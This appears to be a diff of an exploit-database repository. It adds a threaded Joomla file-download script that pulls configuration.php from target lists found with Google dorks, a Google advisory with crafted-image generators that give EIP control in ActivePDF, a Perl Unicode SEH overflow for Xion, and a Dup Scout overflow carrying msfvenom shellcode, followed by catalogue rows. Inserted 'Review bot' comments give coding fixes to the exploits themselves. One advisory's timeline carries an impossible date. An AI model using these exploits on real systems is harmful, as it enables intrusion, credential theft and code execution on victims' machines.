(1) assert copyright on the software, and (2) offer you this License
giving you legal permission to copy, distribute and/or modify it.
For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software. For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.
Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so. This is fundamentally incompatible with the aim of
protecting users' freedom to change the software. The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable. Therefore, we
have designed this version of the GPL to prohibit the practice for those
products. If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.
Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary. To prevent this, the GPL assures that
patents cannot be used to render the program non-free.
The precise terms and conditions for copying, distribution and
modification follow.
'''
try:
import urllib2
except:
print "$ pip2 install urllib2"
try:
import argparse
except:
print "$ pip2 install argparse"
try:
import BeautifulSoup
except:
print "$ pip2 install BeautifulSoup"
try:
import urlparse
except:
print "$ pip2 install urlparse"
try:
import requests
except:
print "$ pip2 install requests"
try:
import threading
except:
print "$ pip2 install threading"
import time, sys , os
global Animation, slowprint, fastprint
os.system('clear')
class Lab_Collors():
vermelho = '\033[31m'
verde = '\033[32m'
azul = '\033[34m'
ciano = '\033[36m'
purple = '\033[35m'
amarelo = '\033[33m'
preto = '\033[30m'
branco = '\033[37m'
original = '\033[0;0m'
reverso = '\033[2m'
default = '\033[0m'
def slowprint(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush() # defeat buffering
time.sleep(8./90)
#time.sleep(10./90)
def fastprint(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush() # defeat buffering
time.sleep(1./50)
def Animation(String, color):
animation = "|/-\\"
for i in range(15):
time.sleep(0.1)
sys.stdout.write("\r" + "[" + animation[i % len(animation)] + "]" + color + String)
sys.stdout.flush()
print('')
print ''
parser = argparse.ArgumentParser(description='JOOMANAGER_Arbitrary_File_Download')
parser.add_argument('-t','--targets', action='store',help='--targets Targets.txt')
args = parser.parse_args()
class Lab_Banners():
Bulls = '''
, .
/| |\
|-| łαbørαŧøriø Ŧαηŧαα |-|
[ "-.____ ____.-" ]
\_ / \ ___.___ / \ _/
"-__[ ===!=== ]__-"
| | +==========================================================+
.-"" _|=__ | __=|_ ""-, | COM_JOOMANAGER ARBITRARY FILE DOWNLOAD |
`""" \ "`==´ `==´" / """´ +==========================================================+
\ \\ // / | [*] GoogleDork: allinurl:index.php?option=com_joomanager |
\ |\___/| / | [*] GoogleDork: allinurl:/component/joomanager/ |
\,;-----;./ | [*] Coded: Luth1er [*] Date: 30 - 06 - 2017 |
| @@ @@ | | [*] GitHub: https://github.com/Luth1er |
\ -"""- / | - I take no responsibilities for the |
`-----´ | - use of this program ! |
+==========================================================+'''
if not args.targets:
os.system('clear')
print Lab_Collors.azul+Lab_Banners.Bulls
print ''
print Lab_Collors.ciano+"[*] Usage: "
print Lab_Collors.branco+"Joomanager_Afd.py --target Targets.txt"
print Lab_Collors.branco+"Joomanager_Afd.py -t Targets.txt"
print ''
exit()
print Lab_Collors.azul+Lab_Banners.Bulls
slowprint(Lab_Collors.ciano+" Telegram: "+Lab_Collors.purple+"@DreadPirateRobertt")
fastprint(Lab_Collors.ciano+" Telegram: "+Lab_Collors.azul+"t.me/Phantasm_Lab")
class COM_JOOMANAGER_ARBITRARY_FILE_DOWNLOAD(threading.Thread):
global Animation, fastprint
def __init__(self, targets):
threading.Thread.__init__(self)
targets = open(targets, 'r').readlines()
self.targets = targets
self.process = None
def run(self):
try:
count = 0
print ''
Animation("COM_JOOMANAGER_ARBITRARY_FILE_DOWNLOAD", Lab_Collors.verde)
print ''
for target in self.targets:
try:
target = target.strip()
exploit3r = "index.php?option=com_joomanager&controller=details&task=download&path=configuration.php"
exploit_dir = str(target+exploit3r)
try:
path = urlparse.urlparse(target).path
url_title = target.replace(path, "")
title = requests.get(url_title)
except:
title = requests.get(target)
exploit = urllib2.urlopen(exploit_dir)
soup = BeautifulSoup.BeautifulSoup(title.content.decode('utf-8','ignore'))
Scraping_title = str(soup.title.text)
with open(soup.title.text+".php","wb") as Attatchment:
Attatchment.write(exploit.read())
print ''
print Lab_Collors.verde+"+==========================+"
print Lab_Collors.verde+"| Exploit Information: |"
print Lab_Collors.verde+"+================================================================================"
print Lab_Collors.purple+"[+] Target: {}".format(Lab_Collors.amarelo+url_title)
print Lab_Collors.purple+"[+] Title: {}".format(Lab_Collors.azul+Scraping_title)
fastprint(Lab_Collors.purple+"[+] Exploited: ========================================================> 100%")
print Lab_Collors.purple+"[+] Server: {}".format(str(Lab_Collors.amarelo+title.headers['server']))
try:
print Lab_Collors.purple+"[+] Connection: {}".format(Lab_Collors.branco+str(title.headers['Connection']))
except:
pass
print Lab_Collors.purple+"[+] Exploit: {}".format(Lab_Collors.vermelho+exploit3r)
print Lab_Collors.purple+"[+] Path: "+Lab_Collors.ciano+"/COM_JOOMANAGER-ARBITRARY-FILE-DOWNLOAD/Title.php"
print Lab_Collors.verde+"+================================================================================"
print ''
count = count + 1
except KeyboardInterrupt:
print("Exiting")
sys.exit(1)
except Exception as Error:
print "Error as {}".format(Error)
pass
Animation("Logout....", Lab_Collors.vermelho)
print Lab_Collors.branco+"[!] Total Exploited: %s" % str(count)
print ''
sys.exit(1)
except KeyboardInterrupt:
print "Exiting...."
sys.exit(1)
def main():
try:
threads = 1
for host in range(int(threads)):
Init_Atck = COM_JOOMANAGER_ARBITRARY_FILE_DOWNLOAD(args.targets)
Init_Atck.daemon=True
Init_Atck.start()
while True: time.sleep(100)
except (KeyboardInterrupt, SystemExit):
print''
Animation(" Exit Threading....", Lab_Collors.vermelho)
if __name__ == '__main__':
try:
main()
except Exception as e:
print "[!] Error as %s" % e
exit()
except KeyboardInterrupt:
fastprint(Lab_Collors.vermelho+"[!] Keyboard as Interrupt....")
exit()
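Review bot: the import guards at the top swallow failures instead of stopping: each bare `except:` only prints a `pip2 install` hint and execution continues, so a missing module surfaces later as a NameError; moreover `urllib2`, `argparse`, `urlparse` and `threading` are part of the Python 2 standard library, not pip packages, so the hint is wrong for them. Catch `ImportError` explicitly and `sys.exit(1)`. Two further points: the downloaded content is written with `open(soup.title.text+".php","wb")`, i.e. to a file name taken verbatim from the remote page's `<title>`, so a title containing path separators or `..` decides where the file lands on the operator's own machine; reduce it to a sanitised basename (`os.path.basename` plus a character whitelist) before opening. And the usage text advertises `Joomanager_Afd.py --target Targets.txt` while the parser defines `--targets`; argparse accepts the unique prefix, but the documentation should match the definition. Minor: the module-level `global Animation, slowprint, fastprint` statement and the `for host in range(int(threads))` loop with `threads = 1` are no-ops.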

@ -0,0 +1,201 @@
ActivePDF Toolkit < 8.1.0 multiple RCE
Introduction
============
The ActivePDF Toolkit is a Windows library which enhances business
processes to stamp, stitch, merge, form-fill, add digital signatures,
barcodes to PDF. Both .NET and native APIs are provided. Amongst many
other operations, this library can be used by applications to transform
images to PDF files.
Multiple vulnerabilities were identified in the Pictview image processing
library embedded by the Toolkit and signed by ActivePDF. They could allow
remote attackers to compromise applications relying on the Toolkit to
process untrusted images. Note that, while the example instances hereafter
use “exotic” file types, the parser determines the image type from magic
bytes, ignoring file extensions in most cases.
CVE
===
CVE-2018-7264
Affected versions
=================
ActivePDF Toolkit before 8.1.0 (build 8.1.0.19023)
Author
======
François Goichon - Google Security Team
CVE-2018-7264
=============
ActivePDF Toolkit < 8.1.0.19023 multiple RCE
Summary
-------
An image processing library embedded in the ActivePDF Toolkit product is
prone to multiple BSS out-of-bound and signedess errors which can yield
direct EIP control by overwriting function pointers, error handling
structures or IAT entries. Note that the affected library does not enable
ASLR.
Reproduction
------------
The following scripts can be used to generate crafted image files which
achieve EIP control when parsed or converted by the ActivePDF Toolkit (e.g.
via the ImageToPDF method), through different root causes. These examples
can be reproduced through both the .NET and native APIs and independently
from file extensions, however the .NET layer will hide the native crashes
and return -1. This may crash the library with a lock on, so only use in
test environments.
* Interchange File Format (.iff) and derivates
---
#!/usr/bin/env python2
#
# eax=28147510 ebx=00009c1c ecx=28147510 edx=00009c1c esi=28140e90
edi=02930a6c
# eip=41414141 esp=0061f264 ebp=0061f26c iopl=0 nv up ei pl nz na
po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010202
# 41414141 ?? ???
from struct import pack
header = "FORMXOXOILBM"
bodycontents = "AAA"
body = "BODY" + pack(">I", len(bodycontents)) + bodycontents
while (len(body) % 2) == 1:
body += "\x00"
base = 0x28147510
payload = pack("<I", base).ljust(0x28151114 - base, "A") + pack("<I", base)
cmap = "CMAP" + pack(">I", len(payload)) + payload
while (len(cmap) % 2) == 1:
cmap += "\x00"
outp = header + cmap + body
assert len(outp) >= 0x28
with open("test.iff", "wb") as f:
f.write(outp)
---
* Zoner Draw images (.zmf, .zbr)
---
#!/usr/bin/env python2
#
# eax=28151110 ebx=0000002e ecx=0000bc28 edx=2813eb10 esi=00000008
edi=028e0a6c
# eip=41414141 esp=2814550c ebp=41414141 iopl=0 nv up ei ng nz ac
pe cy
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010297
# 41414141 ?? ???
from struct import pack
header = pack("<III", 0x5c, 0xD4015ADD, 0x12345678)
header = header.ljust(9*4) + pack("<I", 0x3c)
header = header.ljust(0x3c)
base = 0x2814550C
payload = '\x00' * (0x28151124 - base) + pack("<I", base) + "A"*8
# can be triggered by multiple formats
header2 = pack("<H", 0x4d42)
header2 = header2.ljust(14) + pack("<I", 50-14)
header2 = header2.ljust(28) + pack("<HI", 0, 0)
header2 = header2.ljust(46) + pack("<I", len(payload)/4 + 1)
outp = header + header2 + payload
with open("test.zmf", "w") as f:
f.write(outp)
---
* Sun Raster images (.ras)
---
#!/usr/bin/python2
#
#WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding
can be inaccurate.
#eax=28151110 ebx=0000000c ecx=0000fc2d edx=2813eb10 esi=00000008
edi=02880a6c
#eip=41414141 esp=28141504 ebp=41414141 iopl=0 nv up ei ng nz ac pe
cy
#cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010297
#41414141 ?? ???
from struct import pack
header = pack(">IIIIIII", 0x59A66A95, 0x100, 1, 8, 0, 2, 1)
base = 0x28141504
payload = "".ljust(0x28151124 - base, "\x00") + pack("<I", base) + "A"*8
outp = header + pack(">I", len(payload)+1) + payload
with open("test.ras", "wb") as f:
f.write(outp)
---
* Truevision Targa images (.bpx)
---
#!/usr/bin/env python2
#
#eax=28151110 ebx=00000004 ecx=00000008 edx=2813eb10 esi=00000008
edi=028f0a6c
#eip=41414141 esp=0061f2a0 ebp=0061f2e8 iopl=0 nv up ei ng nz ac pe
cy
#cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010297
#41414141 ?? ???
from struct import pack
target = 0x2815112C
payload = "AAAA"
# TGA / PIC / BPX
base = { 3: 0x28147510, 4: 0x2814550c }
align = None
for al in [3, 4]:
if ((target - base[al]) % al) == 0:
align = al
break
assert align
header = "\x00\x01\x00"
header += pack("<H", (target - base[align])/align)
header += pack("<H", (len(payload)/align)+1)
header += chr(32 if align == 4 else 24)
header = header.ljust(16)
header += chr(1)
header = header.ljust(18)
with open("test.bpx", "wb") as f:
f.write(header + payload)
---
Remediation
-----------
Upgrade to ActivePDF Toolkit >= 8.1.0 (build 8.1.0.19023), which fixes the
problem by removing the affected image processing library. Note that this
also fixes the similar ZDI-16-354 vulnerability.
For more information and guidance, please contact the ActivePDF support
through their portal (https://support.activepdf.com).
Disclosure timeline
===================
2017/11/28 - Report sent to ActivePDF support
2017/11/28 - Support acknowledges the issue and confirms that the library
is scheduled to be removed from the product
2018/01/29 - Received notification from the ActivePDF support that the
Pictview image processing library had been removed from ActivePDF in build
8.1.0.19023
2017/02/26 - Public disclosure
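Review bot: the disclosure timeline ends with `2017/02/26 - Public disclosure`, a date nine months before the `2017/11/28` report that opens it; presumably 2018/02/26, which would also agree with the 2018-03-05 catalogue date for entry 44251. Three smaller points in the reproduction scripts: the `.zmf` generator opens its output with `open("test.zmf", "w")` while the other three use `"wb"`, so on Windows the crafted bytes would be subject to newline translation; the register-dump comments (`# eax=28147510 ... esi=28140e90` followed by `edi=02930a6c` on its own line, and the equivalents in the other three scripts) have been wrapped so that the continuation fragments lack the leading `#`, which would break the scripts if run as shown; and `signedess errors` in the summary should read `signedness errors`.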

exploits/windows/local/44243.pl Executable file
@ -0,0 +1,177 @@
#!/usr/bin/perl
# ########################################################################
# Title: Xion 1.0.125 (.m3u File) Local SEH-based Unicode The “Venetian” Exploit
# Vulnerability Type: Execute Code, Overflow UTF-16LE buffer, Memory corruption
# Date: Feb 18, 2018
# Author: James Anderson (synthetic)
# Original Advisory: http://www.exploit-db.com/exploits/14517 (hadji samir) Published: 2010-07-31
# Exploit mitigation: There is no /SAFESEH, SEHOP, /GS, DEP, ASLR
# About: The technique is taken from that paper: Creating Arbitrary Shellcode In Unicode Expanded Strings Chris Anley
# Tested on: Win NT 5.1.2600 EN: Windows XP SP3 Eng Pro, Intel x86-32
# ########################################################################
# _ _ _ _
# ___ _ _ _ __ | |_| |__ ___| |_(_) ___
# / __| | | | '_ \| __| '_ \ / _ \ __| |/ __|
# \__ \ |_| | | | | |_| | | | __/ |_| | (__
# |___/\__, |_| |_|\__|_| |_|\___|\__|_|\___|
# |___/
#
# ########################################################################
my $path = "/media/s4/DragonR.m3u";
my $buffer_length = 5000;
my $suboffset = 0x104;
my $NOP1 = "\x6F"; # add [edi], ch
my $NOP2 = $NOP1."\x59"; # add [edi], ch # pop ecx
# [0] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Offset to SEH frame
my $crash = "A" x 260;
# [1] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Set SEH frame
$crash .= "\x61".$NOP1; # popad # NOP-eq; nSEH; popad puts an address close to the buffer in EAX
$crash .= "\x79\x41"; # pop r32 pop r32 ret; SEh. address for no /SAFESEH / SEHOP, DEP, ASLR
my $offset_to_payload = length($crash);
# [2] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ settingcode.
# [2.0] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ set ecx=2 and eax -> [shellcode]
$crash .= $NOP1; # NOP-eq
$crash .= "\x6a\x59"; # push 0 # pop ecx
$crash .= $NOP1; # NOP-eq
$crash .= "\x41"; # inc ecx
$crash .= "\xCC"; # add ah, cl # eax = eax + 0x100
$crash .= $NOP1; # NOP-eq
$crash .= "\x41"; # inc ecx
$crash .= "\xC8"; # add al, cl
$crash .= "\xC8"; # add al, cl # eax = eax+2+2;# and as a result: eax = eax + $suboffset(0x104) # EAX -> SC;
# [2.1] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ we're correcting the first BAD character
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x3b\x41"; # mov edx, 41003b00
$crash .= "\x30"; # add [eax],dh
$crash .= $NOP1; # NOP-eq
# [2.2] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ the second byte and the first 00
$crash .= "\x40"; # inc eax
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\xec\x41"; # mov edx, 4100ec00
$crash .= "\x30"; # add [eax],dh
# [2.3] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ the fourth byte 00. BAD char
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x45\x41"; # mov edx, 41004500
$crash .= "\x30"; # add [eax],dh
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x46\x41"; # mov edx, 41004600
$crash .= "\x30"; # add [eax],dh
# [2.4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x68\x41"; # mov edx, 41006800
$crash .= "\x30"; # add [eax],dh
# [2.5] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x78\x41"; # mov edx, 41007800
$crash .= "\x30"; # add [eax],dh
# [2.6] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x2F\x41"; # mov edx, 41002F00
$crash .= "\x30"; # add [eax],dh
# [2.7] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x63\x41"; # mov edx, 41006300
$crash .= "\x30"; # add [eax],dh
# [2.8] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x64\x41"; # mov edx, 41006400
$crash .= "\x30"; # add [eax],dh
# [2.8] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x8d\x41"; # mov edx, 41008d00
$crash .= "\x30"; # add [eax],dh
# [2.9] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\xf8\x41"; # mov edx, 4100f800
$crash .= "\x30"; # add [eax],dh
# [2.10] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\xb8\x41"; # mov edx, 4100b800
$crash .= "\x30"; # add [eax],dh
# [2.11] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x49\x41"; # mov edx, 41004900
$crash .= "\x30"; # add [eax],dh
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x4A\x41"; # mov edx, 41004A00
$crash .= "\x30"; # add [eax],dh
# [2.12] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\x77\x41"; # mov edx, 41007700
$crash .= "\x30"; # add [eax],dh
# [2.13] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$crash .= "\xC8"; # add al, cl # eq eax + 2
$crash .= $NOP1; # NOP-eq
$crash .= "\xba\xd0\x41"; # mov edx, 4100d000
$crash .= "\x30"; # add [eax],dh
# [3] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # -4: one more NOP below # -8: sizeof(SEHframe)
# *2: for UTF-16 # /4: 2 for UTF-16 and 2 for the 2-byte-NOP
$crash .= $NOP2 x (($suboffset - 4 - 8 - (length($crash)*2 - $offset_to_payload*2))/4); # NOP-eq + pop ecx
$crash .= $NOP1."\x6A"; # NOP1 + NOP1-eq (push 0)
# [4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ shellcode. left - ^jalousie; right - actual shellcode that will be crafted. CMD=cmd.exe
my $shellcode =
"\x50". # "\x8b". # # BAD BYTE
# "\xec". # 0
"\x55". # "\x55".
# "\x8b". # 0 # BAD BYTE
"\xec". # "\xec".
# "\x68". # 0
"\x65". # "\x65".
# "\x78". # 0
"\x65". # "\x65".
# "\x2F". # 0
"\x68". # "\x68".
# "\x63". # 0
"\x6d". # "\x6d".
# "\x64". # 0
"\x2e". # "\x2e".
# "\x8d". # 0
"\x45". # "\x45".
# "\xf8". # 0
"\x50". # "\x50".
# "\xb8". # 0
"\xc7". # "\xc7".
# "\x93". # 0 # BAD BYTE
"\xc2". # "\xc2".
# "\x77". # 0
"\xff"; # "\xff".
# "\xd0"; # 0
$crash .= $shellcode;
$crash .= "C" x ($buffer_length - length($crash));
open(myfile, ">$path");
print myfile $crash;
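Review bot: `open(myfile, ">$path")` at the end neither checks the return value nor closes the handle, and writes a raw byte buffer through a bareword filehandle; prefer `open(my $fh, '>', $path) or die "$path: $!"; binmode $fh; print $fh $crash; close $fh;` and add `use strict; use warnings;` at the top. The hard-coded output path `/media/s4/DragonR.m3u` should be documented in the header or taken from `@ARGV`. Documentation nit: the step labels in section [2] use `[2.8]` twice (once before `mov edx, 41006400` and again before `mov edx, 41008d00`), so the numbering of the following steps is off by one.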

exploits/windows/local/44244.py Executable file
@ -0,0 +1,70 @@
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: Dup Scout Enterprise 10.5.12 - Local Buffer Overflow
# Date: 02-22-2018
# Vulnerable Software: Dup Scout Enterprise v10.5.12
# Vendor Homepage: http://www.dupscout.com
# Version: 10.5.12
# Software Link: http://www.dupscout.com/downloads.html
# Tested On: Windows 7 x86
#
# bad chars \x00\x0a and everything above \x80
#
# PoC:
# 1. generate dupscout.txt, copy contents to clipboard
# 2. open app, select Server, select Connect
# 3. type anything into Share Name, paste dupscout.txt contents into User Name
# 4. select Connect and then OK
# 5. pop calc
#
filename="dupscout.txt"
junk = "A"*792
#0x10021144 : push esp # ret | ascii {PAGE_EXECUTE_READ} [libspg.dll]
eip = "\x44\x11\x02\x10"
fill = "\x43"*560
#msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=ESP -f c
#Payload size: 440 bytes
calc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6b\x58\x6b\x32\x53\x30"
"\x57\x70\x67\x70\x53\x50\x4e\x69\x39\x75\x54\x71\x39\x50\x61"
"\x74\x6c\x4b\x66\x30\x44\x70\x6c\x4b\x73\x62\x46\x6c\x6e\x6b"
"\x66\x32\x66\x74\x4e\x6b\x62\x52\x65\x78\x44\x4f\x78\x37\x72"
"\x6a\x46\x46\x44\x71\x6b\x4f\x4c\x6c\x57\x4c\x53\x51\x51\x6c"
"\x47\x72\x34\x6c\x47\x50\x69\x51\x6a\x6f\x64\x4d\x37\x71\x59"
"\x57\x6d\x32\x5a\x52\x51\x42\x61\x47\x4e\x6b\x36\x32\x44\x50"
"\x6c\x4b\x73\x7a\x55\x6c\x4c\x4b\x42\x6c\x52\x31\x63\x48\x6d"
"\x33\x32\x68\x43\x31\x5a\x71\x53\x61\x6c\x4b\x36\x39\x31\x30"
"\x73\x31\x4e\x33\x4c\x4b\x50\x49\x65\x48\x39\x73\x46\x5a\x37"
"\x39\x4e\x6b\x64\x74\x4e\x6b\x63\x31\x78\x56\x35\x61\x6b\x4f"
"\x6e\x4c\x39\x51\x7a\x6f\x46\x6d\x63\x31\x4b\x77\x50\x38\x6d"
"\x30\x32\x55\x79\x66\x35\x53\x71\x6d\x78\x78\x57\x4b\x61\x6d"
"\x35\x74\x70\x75\x69\x74\x30\x58\x4c\x4b\x30\x58\x31\x34\x75"
"\x51\x69\x43\x70\x66\x4c\x4b\x44\x4c\x50\x4b\x6c\x4b\x42\x78"
"\x75\x4c\x76\x61\x4e\x33\x4e\x6b\x57\x74\x4e\x6b\x55\x51\x6a"
"\x70\x4d\x59\x67\x34\x67\x54\x77\x54\x63\x6b\x53\x6b\x33\x51"
"\x42\x79\x73\x6a\x33\x61\x69\x6f\x59\x70\x61\x4f\x61\x4f\x42"
"\x7a\x6e\x6b\x34\x52\x58\x6b\x6e\x6d\x61\x4d\x62\x4a\x35\x51"
"\x4c\x4d\x4f\x75\x4f\x42\x73\x30\x33\x30\x63\x30\x46\x30\x42"
"\x48\x45\x61\x6e\x6b\x52\x4f\x4d\x57\x6b\x4f\x4a\x75\x4d\x6b"
"\x4c\x30\x58\x35\x39\x32\x51\x46\x51\x78\x49\x36\x4a\x35\x6f"
"\x4d\x4d\x4d\x59\x6f\x4a\x75\x55\x6c\x54\x46\x31\x6c\x65\x5a"
"\x6d\x50\x59\x6b\x49\x70\x31\x65\x37\x75\x4f\x4b\x73\x77\x62"
"\x33\x62\x52\x52\x4f\x53\x5a\x73\x30\x76\x33\x79\x6f\x68\x55"
"\x62\x43\x70\x61\x42\x4c\x35\x33\x76\x4e\x53\x55\x30\x78\x43"
"\x55\x43\x30\x41\x41")
buffer = junk + eip + calc + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
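Review bot: the output is written with `open(filename , 'w')` and closed by hand; use `with open(filename, 'wb') as textfile:` so the bytes are written untranslated and the handle is closed even if the write fails. The comment records the msfvenom output as `Payload size: 440 bytes`, but nothing checks it; an `assert len(calc) == 440` next to the string would catch a regenerated payload of a different size before `buffer = junk + eip + calc + fill` silently shifts the layout.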

@ -5888,6 +5888,8 @@ id,file,description,date,author,type,platform,port
44235,exploits/macos/dos/44235.c,"Apple macOS Sierra 10.12.1 - 'IOFireWireFamily' FireWire Port Denial of Service",2017-08-19,"Brandon Azad",dos,macos,
44238,exploits/osx/dos/44238.c,"Apple OS X Yosemite - 'flow_divert-heap-overflow' Kernel Panic",2017-01-10,"Brandon Azad",dos,osx,
44236,exploits/macos/dos/44236.c,"Apple macOS Sierra 10.12.3 - 'IOFireWireFamily-null-deref' FireWire Port Denial of Service",2017-08-16,"Brandon Azad",dos,macos,
44247,exploits/multiple/dos/44247.txt,"Suricata < 4.0.4 - IDS Detection Bypass",2018-03-05,"Positive Technologies",dos,multiple,
44251,exploits/windows/dos/44251.txt,"ActivePDF Toolkit < 8.1.0.19023 - Multiple Memory Corruptions",2018-03-05,"François Goichon",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
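Review bot: the new `44251` row classifies the ActivePDF Toolkit entry as type `dos`, while the advisory it indexes is titled `multiple RCE` and describes direct EIP control via overwritten function pointers; either the catalogue type or the advisory title should be reconsidered so that the two agree.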
@ -9566,6 +9568,9 @@ id,file,description,date,author,type,platform,port
44234,exploits/macos/local/44234.c,"Apple macOS High Sierra 10.13 - 'ctl_ctloutput-leak' Information Leak",2017-12-07,"Brandon Azad",local,macos,
44237,exploits/macos/local/44237.md,"Apple macOS Sierra 10.12.1 - 'physmem' Local Privilege Escalation",2017-01-16,"Brandon Azad",local,macos,
44239,exploits/osx/local/44239.md,"Apple OS X 10.10.5 - 'rootsh' Local Privilege Escalation",2016-05-16,"Brandon Azad",local,osx,
44243,exploits/windows/local/44243.pl,"Xion 1.0.125 - '.m3u' Local SEH-Based Unicode Venetian Exploit",2018-03-05,synthetic,local,windows,
44244,exploits/windows/local/44244.py,"Dup Scout Enterprise 10.5.12 - 'Share Username' Local Buffer Overflow",2018-03-05,bzyo,local,windows,
44246,exploits/linux/local/44246.txt,"Sophos UTM 9.410 - 'loginuser' 'confd' Service Privilege Escalation",2018-03-05,KoreLogic,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16292,6 +16297,8 @@ id,file,description,date,author,type,platform,port
44227,exploits/php/remote/44227.php,"Joomla! 3.7 - SQL Injection",2017-07-04,"Manish Tanwar",remote,php,
44228,exploits/php/remote/44228.php,"Posnic Stock Management System - SQL Injection",2017-02-03,"Manish Tanwar",remote,php,
44229,exploits/php/remote/44229.txt,"WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)",2017-10-22,"Manish Tanwar",remote,php,
44242,exploits/android/remote/44242.md,"Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record",2018-02-25,iamrastating,remote,android,
44245,exploits/hardware/remote/44245.rb,"NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -38557,7 +38564,7 @@ id,file,description,date,author,type,platform,port
